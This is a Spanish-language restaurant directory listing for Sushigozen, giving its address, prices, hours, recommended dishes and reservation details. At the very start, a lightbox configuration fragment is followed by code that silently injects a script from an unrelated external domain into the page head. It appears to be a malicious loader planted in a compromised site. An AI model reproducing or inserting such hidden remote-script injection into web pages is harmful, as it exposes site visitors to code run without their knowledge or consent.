, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })

Sushigozen

Sushigozen

Dirección:  Carrera 14 #93B-45 Locales 2 y 3
Zona:
Norte
Precio Promedio Plato por Persona: 
Entre 30.000  y 50.000 pesos
Formas de Pago: 
Reciben Todas las  Tarjetas
TELÉFONO DE RESERVAS:   744 90 97

Para reservar ONLINE haga click en:

RESERVAR AHORA EN EL RESTAURANTE SUSHIGOZEN

Categoría: Asiático

Sushigozen es un restaurante donde la variedad, la frescura y el buen sabor son naturales a la hora de atender a sus clientes. Es considerados como uno de los mejores sushis de la ciudad.

Allí podemos encontrar deliciosos platos como el Sushi, el Nabemono, los platos al Wok y el Tepanyaki, especialidades que se destacan entre la gran variedad de sabores, olores y sensaciones que a diario deleitan a su amplia clientela.

Sus propietarios están convencidos de que una atención personalizada es esencial para el éxito de un restaurante. Todos los chefs son especialistas en comida japonesa.

Recomendados:

- Langostinos tempura
- Ramen
- Helado de té verde (Postre)

Horario de atención:
Lunes a Viernes 12:00m. a 3:00p.m.
Sábado 12:00m. a 11:00p.m.

Parqueaderos cercanos:
Centro Comercial Centro 93

Deja un comentario